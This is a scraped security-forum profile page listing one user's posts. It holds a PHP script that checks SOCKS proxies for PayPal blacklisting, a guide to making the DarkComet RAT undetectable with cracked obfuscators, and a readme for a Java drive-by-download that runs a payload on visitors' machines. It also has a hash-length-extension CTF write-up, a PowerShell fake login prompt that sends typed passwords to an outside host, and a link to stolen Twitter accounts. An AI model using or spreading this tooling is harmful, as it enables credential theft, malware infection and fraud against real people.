Fi8sVrs
-
Posts
3206 -
Joined
-
Days Won
87
Posts posted by Fi8sVrs
-
-
that the password can not handle, can be PM?
RST
-
+ needs curl :
<?php
set_time_limit(0);
error_reporting(0);
global $socks_list,$site,$sockstimeout,$paypaltimeout,$list,$lives;
$socks_list = $_POST["sockslist"];
if (strlen($socks_list)<1) {$socks_list = "82.67.164.189:55525\n71.229.119.8 11465\n67.81.180.167|59931\n211.189.18.165/5818\n";}
if($_POST["submit"]){
function getsocks($list)
{
preg_match_all("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}[
-\s\/]\d{1,7}/", $list, $socks);$socks = array_unique($socks[0]);
$socks2 = array();
For ($i=0;$i<count($socks);$i++)
{
if($_POST['port']){
If(stristr($socks[$i],$_POST['port1'])){
continue;
}
}
If (strlen($socks[$i]) > 7) $socks2[] = str_replace(array("|", "/", " ", "-"),':',$socks[$i]);
}
Return $socks2;
}
$socks_list = str_replace(" ",":",$socks_list);
$socks_list = str_replace("|",":",$socks_list);
$socks_list = str_replace("/",":",$socks_list);
$AllSocks = getsocks($socks_list);
$All = count($AllSocks);
$socks_list = "";
For ($i = 1; $i <= $All; $i++)
{
$socks_list .= $AllSocks[$i-1]."\n";
}
}
$site = $_POST["site"];
if (strlen($site)<1) {$site = "http://google.com/";}
$sockstimeout = $_POST["sockstimeout"];
if (!isset($sockstimeout)) {$sockstimeout = 3;}
?>
<title>-=[ Check Socks Online ]=-</title>
<style>body{
font-family:Tahoma;
font-size:12px;
background-color:#000000;
color:#FFFFFF;
}
a:link,a:visited,a:active{
font-family:Tahoma;
font-size:12px;
color:#C0C0C0;
text-decoration:none;
}
a:hover{
color:white;
text-decoration:none;
font-family:Tahoma;
font-size:12px;
}
table,tr,td{
padding:3px;
font-family:Tahoma;
font-size:12px;
background-color:#000000;
border:1px dotted #C0C0C0;
}
input{
padding:3px;
font-family:Tahoma;
font-size:12px;
background-color:#000000;
border:1px dotted #C0C0C0;
color:#C0C0C0;
}
textarea{
padding:3px;
font-family:Tahoma;
font-size:12px;
background-color:#000000;
border:1px dotted #C0C0C0;
color:#C0C0C0;
}
</style>
<script type="text/javascript">
function timsock(){
var slist = window.document.f.sockslist.value;
var fuck = slist.match(/\d{1,3}([.])\d{1,3}([.])\d{1,3}([.])\d{1,3}((
|(\s)+)\d{1,8}/g );if(fuck){
var list="";
for(var i=0;i<fuck.length;i++){
if(fuck.match(/\d{1,3}([.])\d{1,3}([.])\d{1,3}([.])\d{1,3}(\s)+\d{1,8}/g )){
fuck=fuck.replace(/(\s)+/,':');
}
list=list+fuck+"\n";
}
window.document.f.sockslist.value=list;
}
else{
window.document.f.sockslist.value="Not found";
}
}
</script>
</head>
<center><h1>-=[ Check Socks Online ]=-</h1></center>
<form action="" method="post" name="f">
<center><textarea name="sockslist" cols="150" rows="10"><?=$socks_list?></textarea></center>
<div align='center'>
Destination : <input type="text" name="site" size="30" maxlength="200" value="http://google.com" /> -
Del Port : <input type=text size=9 name=port1 value= 1080,8080 ><input type=checkbox name=port> - Sock Time-Out : <select name="sockstimeout" ><option value="10" <?If ($sockstimeout == 10) echo 'selected';?> >10s</option><option value="9" <?If ($sockstimeout == 9) echo 'selected';?> >9s</option><option value="8" <?If ($sockstimeout == 8) echo 'selected';?> >8s</option><option value="7" <?If ($sockstimeout == 7) echo 'selected';?> >7s</option><option value="6" <?If ($sockstimeout == 6) echo 'selected';?> >6s</option><option value="5" <?If ($sockstimeout == 5) echo 'selected';?> >5s</option><option value="4" <?If ($sockstimeout == 4) echo 'selected';?> >4s</option><option value="3" <?If ($sockstimeout == 3) echo 'selected';?> >3s</option><option value="2" <?If ($sockstimeout == 2) echo 'selected';?> >2s</option><option value="1" <?php If ($sockstimeout == 1) echo 'selected';?> >1s</option></select> -
<font color=yellow>Clear Paypal</font> <input name="Clear" type="checkbox" id="Clear" <?php if($_POST['Clear']){ echo 'checked'; } ?>/>
- PP Time-Out : <input name="timeoutpp" type="text" value=5 size=3 /><br><br>
<input type="submit" value=" Submit !!! " name="submit" onClick="timsock()"/>
</div>
</form>
<?php
if($_POST["submit"]){
$died = "";
function flush_buffers(){
ob_end_flush();
ob_flush();
flush();
ob_start();
}
function grabdb($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
function _checkClearPP($socks){
$cookie = md5(time()).'_pp.txt';
fclose(fopen($cookie,'w'));
$postdata = "cmd=_s-xclick&hosted_button_id=DJX2GBY6CSR4N";
$url = 'https://www.paypal.com/cgi-bin/webscr';
$agent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, 100);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_PROXY, $socks);
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt($ch, CURLOPT_POST,true);
curl_setopt($ch, CURLOPT_POSTFIELDS,$postdata);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);
$step2 = curl_exec($ch);
unlink($cookie);
if($step2 == false){
//return 'Curl error: ' . curl_error($ch);
$cl = 2;
}else{
if(stristr($step2,'Re-enter password')){
$cl = 1;
}else{
$cl = 0;
}
}
curl_close($ch);
//unlink($cookie);
return $cl;
}
function ip2location($ip){
$d = file_get_contents("http://api.ipinfodb.com/v3/ip-city/?key=5e9a99b4d163bc021ffc97ad634b941b7cbe9f1770ba0e04561f72a3c5770d87&ip=$ip");
$d = explode(";",$d);
$country_code = $d[3];
$country_name = $d[4];
$region_name = $d[5];
$city = $d[6];
$zippostalcode = $d[7];
$latitude = $d[8];
$longitude = $d[9];
$timezone = $d[10];
return array('ip' => $ip, 'country_code' => $country_code, 'country_name' => $country_name, 'RegionName' => $region_name, 'city' => $city, 'ZipPostalCode' => $zippostalcode, 'latitude' => $latitude, 'longitude' => $longitude, 'Timezone' => $timezone);
}
Function check($Socks,$site,$sockstimeout,$paypaltimeout){
$cookie_file_path = md5(microtime().rand(0,999)).'_cookie.txt';
$fp = fopen($cookie_file_path,'wb');
fclose($fp);
$curl = curl_init();
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($curl, CURLOPT_HEADER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($curl, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($curl, CURLOPT_HTTPPROXYTUNNEL, 1);
curl_setopt($curl, CURLOPT_PROXY, $Socks);
curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt($curl, CURLOPT_DNS_CACHE_TIMEOUT,1);
curl_setopt($curl, CURLOPT_TIMEOUT,$sockstimeout);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,$sockstimeout);
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$site .= "?".microtime();
curl_setopt($curl, CURLOPT_URL, $site);
$Exec = curl_exec($curl);
$info = curl_getinfo($curl);
$sock1 = explode(":",$Socks);
$PORT = $sock1[1];
$sock2 = $sock1[0];
$sock2 = str_replace(",", ".", $sock2);
$ip = ip2location($sock2);
$country_name = $ip['country_name'];
$region = $ip['RegionName'];
$city = $ip['city'];
$postal_code = $ip['ZipPostalCode'];
if ($country_name == "") $country_name = "Unknown";
if ($region == "") $region = "Unknown";
if ($city == "") $city = "Unknown";
if ($postal_code == "") $postal_code = "Unknown";
If ($Exec)
{
$times = $info['connect_time'];
if ($_POST['Clear']){
if(_checkClearPP($Socks) == 0){
$clpp = "<font color=green>Clear Paypal</font>";
}elseif(_checkClearPP($Socks) == 1){
$clpp = "<font color=red>Blacklist Paypal</font>";
}else{
$clpp = "<font color=darkchild>Unknow</font>";
}
$Result1 = "<font color='#00DB00'><b>Live</b></font> | <font color='#00DB00'>". $Socks ."</font> | <b>".$clpp."</b> | Times: <font color='yellow'>". $times ."s</font> | City: <font color='white'>". $city ."</font> | State: <font color='#56DB99'>". $region ."</font> | Zipcode: <font color='#FFA500'>". $postal_code ."</font> | Country: <font color='yellow'>". $country_name ."</font><br>";
}
else{
$Result1 = "<font color='#00DB00'><b>Live</b></font> | <font color='#00DB00'>".$Socks."</font> | Times: <font color='yellow'>".$times."s</font> | City: <font color='white'>".$city."</font> | State: <font color='#56DB99'>".$region."</font> | Zipcode: <font color='#FFA500'>".$postal_code."</font> | Country: <font color='yellow'>".$country_name."</font><br>";
}
}
else
{
$Result1 = "<font color='red'><b>Die</b></font> | <font color='#00DB00'>".$Socks."</font> | <font color=red>".curl_error($curl)."</font> | City: <font color='white'>".$city."</font> | State: <font color='#56DB99'>".$region."</font> | Zipcode: <font color='#FFA500'>".$postal_code."</font> | Country: <font color='yellow'>".$country_name."</font><br>";
}
curl_close($curl);
unlink($cookie_file_path);
return $Result1;
}
echo "<b><center>-=[Checking Socks with timeout $sockstimeout s ]=-</b><br></center>";
echo "<br><strong>Start Checking $All Socks...</strong><br><hr>";
for ($i=1;$i<=$All;$i++){
if (strlen($AllSocks[$i-1])>10)
{
$Socks = $AllSocks[$i-1];
$s = Check($Socks,$site,$sockstimeout,$paypaltimeout);
if(stristr($s,"<b>Live</b>") && stristr($s,"Clear Paypal")){
echo $i.' | '.$s;
$lives['cl'][] .= $s;
}elseif(stristr($s,"<b>Live</b>")){
echo $i.' | '.$s;
$lives['notcl'][] .= $s;
}
else{
echo $i.' | '.$s;
}
flush_buffers();
}
}
if(count($lives)>0){
echo "<br><strong>List Socks Live</strong></br><hr>";
if ($_POST['Clear']){
if(count($lives['cl'])>0){
foreach($lives['cl'] as $cl){
echo $cl;
}
}
if(count($lives['notcl'])>0){
foreach($lives['notcl'] as $notcl){
echo $notcl;
}
}
}else{
foreach($lives['notcl'] as $li){
echo $li;
}
}
}
}
?>
Sursa: Check Script
-
European airline Ryanair has admitted falling victim to a hacking attack that saw €4.6m of the company's money transferred to a bank account in China.
Law enforcement agencies and financial organisations have already been alerted to the incident, according to reports, and Ryanair is confident that it will get the money back.
"Ryanair confirms that it has investigated a fraudulent electronic transfer via a Chinese bank last week. The airline has been working with its banks and the relevant authorities and understands that the funds, less than $5m, have now been frozen," the company said.
"The airline expects these funds to be repaid shortly, and has taken steps to ensure that this type of transfer cannot recur. As this matter is subject to legal proceedings, no further comment will be made."
The relevant authority in Ryanair's home country of Ireland is the Criminal Assets Bureau, an independent body with powers similar to the local police.
Like the UK Assets Recovery Agency, the Criminal Assets Bureau focuses on serious crimes and the ability to pursue assets from criminals and compensate victims.
The airline industry benefits and suffers from its use of technology. American Airlines was forced to ground flights this week because of a software problem. British Airways fell victim to an apparent hack in March that affected its most frequent fliers.
The company cleared out some of its user accounts and changed log-ins, but it was revealed that the hack was more of a probe on its systems enabled by a leak from another provider.
"This appears to have been the result of a third party using information obtained elsewhere on the internet, via an automated process, to try to gain access to some accounts,” BA said in a statement at the time.
The incidents underline the perils technology can pose to businesses and the importance of having adequete plans in place should things go wrong.
-
WIP - Work In Progress
This is a ComboList Maker for League of Legends for Sentry. It has the option to scrape from 2 sites at the moment: lolsummoners.com, loldb.gameguyz.com
Advanced Options have been added and will be further updated.
Reporting any found issues would greatly be appreciated.
-
Size: 32,04 MB
Speedtest.net Clone - The Global Broadband Speed Test Script
The ultimate fully customizable Speed Test application for your website. Easy to install and ready in a few minutes. Measures bandwidth up to Gb/s. Test statistics database, advanced VoIP test and much more are available.
Download
Source: nulled
-
This video demonstrates how to make a darkcomet rat undetectable.
P.S. these are the names of tools needed for it to work:
- [C#] Source Code Generator V4.0 Final
- DeepSea Obfuscator.v4.0.1.16.full
- DNGuard HVM.Enterprise 3.60 cracked-SND
- DarkComet Version 5.3.1
- Microsoft visual studio
- [C#] Source Code Generator V4.0 Final
-
Readme:
Step 1.) Open game.java and change fileLink to a link to a ZIPPED file that you want to download and execute to the remote pc..
Step 2.) whilst still in game.java change fileDir to the directory of the computer where you want to download your application to.
Step 3.) Find out what JDK version you have and edit the three .bat files to correspond to your JDK version - Example:
"C:\Program Files\Java\jdk1.6.0_16\bin\javac.exe" -cp . *.java
This shows my version of JDK is 1.6.0_16 if you go to 'C:\Program Files\Java\' and see what version of jdk you had e.g. 1.6.0_21 you would change the three files so that it
was like so:
"C:\Program Files\Java\jdk1.6.0_21\bin\javac.exe"
Step 4.) Run Compile.bat if no errors show then proceed to step 5.
Step 5.) Run Make JAR-FILE.bat
Step 6.) Run 'SIGN YOUR JAR.bat' and when prompted enter the password 'java123' it will not show your typing but it will be there after typing 'java123' hit enter.
Step 7.) Upload yourfile.zip, Client.html, and Client.jar to a webhost, and then send people to http://yourlink.com/Client.html to execute the Drive By Download on them. -
As many of you know, last weekend was Ghost in the Shellcode 2015! There were plenty of fun challenges, and as always I had a great time competing! This will be my first of four writeups, and will be pretty simple (since it simply required me to use a tool that already exists (and that I wrote)
The level was called "knockers". It's a simple python script that listens on an IPv6 UDP port and, if it gets an appropriately signed request, opens one or more other ports. The specific challenge gave you a signed token to open port 80, and challenged you to open up port 7175. The service itself listened on port 8008 ("BOOB", to go with the "knockers" name).
You can download the original level here (Python).
# python2 please
import sys
import struct
import hashlib
import os
from binascii import hexlify, unhexlify
import SocketServer
import socket
try:
from fw import allow
except ImportError:
def allow(ip,port):
print 'allowing host ' + ip + ' on port ' + str(port)
PORT = 8008
g_h = hashlib.sha512
g_key = None
def generate_token(h, k, *pl):
m = struct.pack('!'+'H'*len(pl), *pl)
mac = h(k+m).digest()
return mac + m
def parse_and_verify(h, k, m):
ds = h().digest_size
if len(m) < ds:
return None
mac = m[:ds]
msg = m[ds:]
if h(k+msg).digest() != mac:
return None
port_list = []
for i in range(0,len(msg),2):
if i+1 >= len(msg):
break
port_list.append(struct.unpack_from('!H', msg, i)[0])
return port_list
class KnockersRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
global g_key
data, s = self.request
print 'Client: {} len {}'.format(self.client_address[0],len(data))
l = parse_and_verify(g_h, g_key, data)
if l is None:
print 'bad message'
else:
for p in l:
allow(self.client_address[0], p)
class KnockersServer(SocketServer.UDPServer):
address_family = socket.AF_INET6
def load_key():
global g_key
f=open('secret.txt','rb')
g_key = unhexlify(f.read())
f.close()
def main():
global g_h
global g_key
g_h = hashlib.sha512
if len(sys.argv) < 2:
print '''Usage:
--- Server ---
knockers.py setup
Generates a new secret.txt
knockers.py newtoken port [port [port ...]]
Generates a client token for the given ports
knockers.py serve
Runs the service
--- Client ---
knockers.py knock <host> <token>
Tells the server to unlock ports allowed by the given token
'''
elif sys.argv[1]=='serve':
load_key()
server = KnockersServer(('', PORT), KnockersRequestHandler)
server.serve_forever();
elif sys.argv[1]=='setup':
f = open('secret.txt','wb')
f.write(hexlify(os.urandom(16)))
f.close()
print 'wrote new secret.txt'
elif sys.argv[1]=='newtoken':
load_key()
ports = map(int,sys.argv[2:])
print hexlify(generate_token(g_h, g_key, *ports))
elif sys.argv[1]=='knock':
ai = socket.getaddrinfo(sys.argv[2],PORT,socket.AF_INET6,socket.SOCK_DGRAM)
if len(ai) < 1:
print 'could not find address: ' + sys.argv[2]
return
family, socktype, proto, canonname, sockaddr = ai[0]
s = socket.socket(family, socktype, proto)
s.sendto(unhexlify(sys.argv[3]), sockaddr)
else:
print 'unrecognized command'
if __name__ == '__main__':
main()
The vulnerability
To track down the vulnerability, let's have a look at the signature algorithm:
def generate_token(h, k, *pl):
m = struct.pack('!'+'H'*len(pl), *pl)
mac = h(k+m).digest()
return mac + mIn that function, h is a hash function (sha-512, specifically), k is a random 16-byte token, randomly generated, and m is an array of 16-bit representation of the ports that the user wishes to open. So if the user wanted to open port 1 and 2, they'd send "\x00\x01\x00\x02", along with the appropriate token (which the server administrator would have to create/send, see below).
Hmm... it's generating a mac-protected token and string by concatenating strings and hashing them? If you've followed my blog, this might sound very familiar! This is a pure hash extension vulnerability!
I'm not going to re-iterate what a hash extension vulnerability is in great detail—if you're interested, check out the blog I just linked—but the general idea is that if you generate a message in the form of
msg + H(secret + msg)
, the user can arbitrarily extend the message and generate a new signature! That means if we have access to any port, we have access to every port!
Let's see how!
Generating a legit token
To use the python script linked above, first run 'setup':
$ python ./knockers.py setup
wrote new secret.txtWhich generates a new secret. The secret is just a 16-byte random string that's stored on the server. We don't really need to know what the secret is, but for the curious, if you want to follow along and verify your numbers against mine, it's:
$ cat secret.txt
2b396fb91a76307ce31ef7236e7fd3dfNow we use the tool (on the same host as the secret.txt file) to generate a token that allows access on port 80:
$ python ./knockers.py newtoken 80
83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050Notice the first 512 bits (64 bytes) is the signature—which is logical, since it's sha512—and the last 16 bits (2 bytes) are 0050, which is the hex representation of 80. We'll split those apart later, when we run hash_extender, but for now let's make sure the token actually works first!
We start the server:
$ python ./knockers.py serve
And in another window, or on another host if you prefer, send the generated token:
$ python ./knockers.py knock localhost 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050
In the original window, you'll see that it was successful:
$ python ./knockers.py serve
Client: ::1 len 66
allowing host ::1 on port 80Now, let's figure out how to create a token for port 7175!
Generating an illegit (non-legit?) token
So this is actually the easiest part. It turns out that the awesome guy who wrote hash_extender (just kidding, he's not awesome) built in everything you needed for this attack!
Download and compile hash_extender if needed (definitely works on Linux, but I haven't tested on any other platforms—testers are welcome!), and run it with no arguments to get the help dump. You need to pass in the original data (that's "\x00\x80"), the data you want to append (7175 => "\x1c\x07"), the original signature, and the length of the secret (which is 16 bytes). You also need to pass in the types for each of the parameters ("hex") in case the defaults don't match (in this case, they don't—the appended data is assumed to be raw).
All said and done, here's the command:
./hash_extender --data-format hex --data 0050 \
--signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 \
--append "1c07" --append-format hex \
-l 16You can pass in the algorithm and the desired output format as well, if we don't, it'll just output in every 512-bit-sized hash type. The output defaults to hex, so we're happy with that.
$ ./hash_extender --data-format hex --data 0050 --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 --append "1c07" --append-format hex -l 16
Type: sha512
Secret length: 16
New signature: 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894
New string: 005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07
[strike]
Type: whirlpool
Secret length: 16
New signature: f4440caa0da933ed497b3af8088cb78c49374853773435321c7f03730386513912fb7b165121c9d5fb0cb2b8a5958176c4abec35034c2041315bf064de26a659
New string: 0050800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07[/strike]Ignoring the whirlpool token, since that's the wrong algorithm, we now have a new signature and a new string. We can just concatenate them together and use the built-in client to use them:
$ python ./knockers.py knock localhost 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07
And checking our server, we see a ton of output, including successfully opening port 7175:
$ python ./knockers.py serve
Client: ::1 len 66
allowing host ::1 on port 80
Client: ::1 len 178
allowing host ::1 on port 80
allowing host ::1 on port 32768
allowing host ::1 on port 0
allowing host ::1 on port 0
[...repeated like 100 times...]
allowing host ::1 on port 0
allowing host ::1 on port 0
allowing host ::1 on port 144
allowing host ::1 on port 7175And that's it! At that point, you can visit http://knockers.2015.ghostintheshellcode.com:7175 and get the key.
Source skullsecurity
-
Metasploit Minute has entered into it’s 3rd “season”. And we kick it off with using the Metasploit capture modules to capture creds from this powershell popup. The cool thing about this is you can leave it to execute on a system without any other code on disk and get creds constantly as any level of user. No admin, no UAC bypass needed. Just a bunch of creds for free.. over SSL. ;–)
Here is the video:
Here is the code:
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[system.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [system.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [system.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');
Lets break down the code line by line:
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserName,[Environment]::UserDomainName);This tells windows to prompt for credentials, with the title of “Failed Authentication”, no info in the comment (so it uses default), and include the username and domain in the box to add authenticity. Thats where all the magic is, everything else is just gravy.
[system.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};Tells powershell not to verify SSL certificates (allows us to use self signed certs in the HTTPS transaction later
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
Creates a new webclient object and sets its user agent to ‘wget’
Creates a new webclient object and sets its user agent to ‘wget’
Tells powershell to use whatever proxy the current user uses with whatever credentials they have cached. If one or both are unnecessary it just ignores these settings.
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
Tells powershell that the HTTP-Basic credentials to use are the ones typed in the popup box recently by the user.
$result = $wc.downloadstring('https://172.16.102.163');And finally the request to HTTP-Basic capture module in metasploit, but you could have anything you want capture these creds.
cat power.txt | iconv --to-code UTF-16LE | base64
JABjAHIAZQBkACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAHAAcgBvAG0AcAB0AGYAbwByAGMAcgBlAGQAZQBuAHQAaQBhAGwAKAAnAEYAYQBpAGwAZQBkACAAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACcALAAnACcALABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBVAHMAZQByAEQAbwBtAGEAaQBuAE4AYQBtAGUAIAArACAAIgBcACIAIAArACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBOAGEAbQBlACwAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBEAG8AbQBhAGkAbgBOAGEAbQBlACkAOwAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACQAdwBjACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsACgAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAVQBzAGUAcgAtAEEAZwBlAG4AdAAiACwAIgBXAGcAZQB0AC8AMQAuADkAKwBjAHYAcwAtAHMAdABhAGIAbABlACAAKABSAGUAZAAgAEgAYQB0ACAAbQBvAGQAaQBmAGkAZQBkACkAIgApADsACgAkAHcAYwAuAFAAcgBvAHgAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsACgAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsACgAkAHcAYwAuAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAYwByAGUAZABlAG4AdABpAGEAbAAoACQAYwByAGUAZAAuAHUAcwBlAHIAbgBhAG0AZQAsACAAJABjAHIAZQBkAC4AZwBlAHQAbgBlAHQAdwBvAHIAawBjAHIAZQBkAGUAbgB0AGkAYQBsACgAKQAuAHAAYQBzAHMAdwBvAHIAZAAsACAAJwAnACkAOwAKACQAcgBlAHMAdQBsAHQAIAA9ACAAJAB3AGMALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADcAMgAuADEANgAuADEAMAAyAC4AMQA2ADMAJwApADsACgA=
Then execute
powershell -ep bypass -enc <the encoded text from above>
and you get this:
Image should be here:
root@wpad:~/metasploit-framework# ./msfconsole -Lq
msf > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > show options
Module options (auxiliary/server/capture/http_basic):
Name Current Setting Required Description
---- --------------- -------- -----------
REALM Secure Site yes The authentication realm you'd like to present.
RedirectURL no The page to redirect users to after they enter basic auth creds
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:443...
[*] Using URL: https://0.0.0.0:443/
[*] Local IP: https://172.16.102.163:443/
[*] Server started.
[*] 172.16.102.140 http_basic - Sending 401 to client 172.16.102.140
[+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /
Source: room362
-
aprox 2.5k conturi twitter worlwide
Download:
OrhDWPZlVi3zO92C05IBLr3l4GfD3q1sdDMs
rc4
key
https://rstforums.com/forum/100971-conturi-twitter.rst
-
This archive contains 174 exploits that were added to Packet Storm in April, 2015.
1504-exploits/
1504-exploits/wpwoocommerceaa-shelldisclose.txt
1504-exploits/emailmarkerter-xss.txt
1504-exploits/projectsend561-xsrf.txt
1504-exploits/nodesstudio-sqlxssdiscose.txt
1504-exploits/wpsam-disclose.txt
1504-exploits/VL-1314.txt
1504-exploits/VL-1227.txt
1504-exploits/airties-exec.txt
1504-exploits/oracledotcom-xss.txt
1504-exploits/prolink-xsrf.txt
1504-exploits/PRL-2015-05.tgz
1504-exploits/wpphpec-upload.txt
1504-exploits/AS-WFTP0328.txt
1504-exploits/hippocms-crlf.txt
1504-exploits/bloofoxcms050-xss.txt
1504-exploits/wpbusinessintelligence-sql.txt
1504-exploits/wpthecartpress-xsslfi.txt
1504-exploits/netgearwnr2000v4-xssexec.txt
1504-exploits/SpiritSploit.py.txt
1504-exploits/ms15-034.txt
1504-exploits/mediasuitecms-disclose.txt
1504-exploits/proftpd135-filecopy.txt
1504-exploits/6kbbs80-xss.txt
1504-exploits/cve-2014-7822_poc.c
1504-exploits/proftpd135-exec.txt
1504-exploits/wpallinone-sql.txt
1504-exploits/multi_ncc_ping_exec.rb.txt
1504-exploits/phplist3010-insecure.txt
1504-exploits/6kbbs-sql.txt
1504-exploits/0xb16b00b5.tgz
1504-exploits/adbbackup-traversal.txt
1504-exploits/netcatcms-traversal.txt
1504-exploits/wp42-xss.txt
1504-exploits/fedoraabrt-racecondition.txt
1504-exploits/oraclehyperionsmart-dos.txt
1504-exploits/VL-1311.txt
1504-exploits/wpfusionengage-disclose.txt
1504-exploits/VL-1322.txt
1504-exploits/wpnexforms-sql.txt
1504-exploits/landesk-rfixsrf.txt
1504-exploits/VL-1445.txt
1504-exploits/wp_wpshop_ecommerce_file_upload.rb.txt
1504-exploits/wp_inboundio_marketing_file_upload.rb.txt
1504-exploits/honeywell-traversal.txt
1504-exploits/VL-1455.txt
1504-exploits/adobe_flash_casi32_int_overflow.rb.txt
1504-exploits/proverbswebcal212-xss.txt
1504-exploits/wtknetwork-sql.txt
1504-exploits/kemploadmaster-execxsrfxssdos.txt
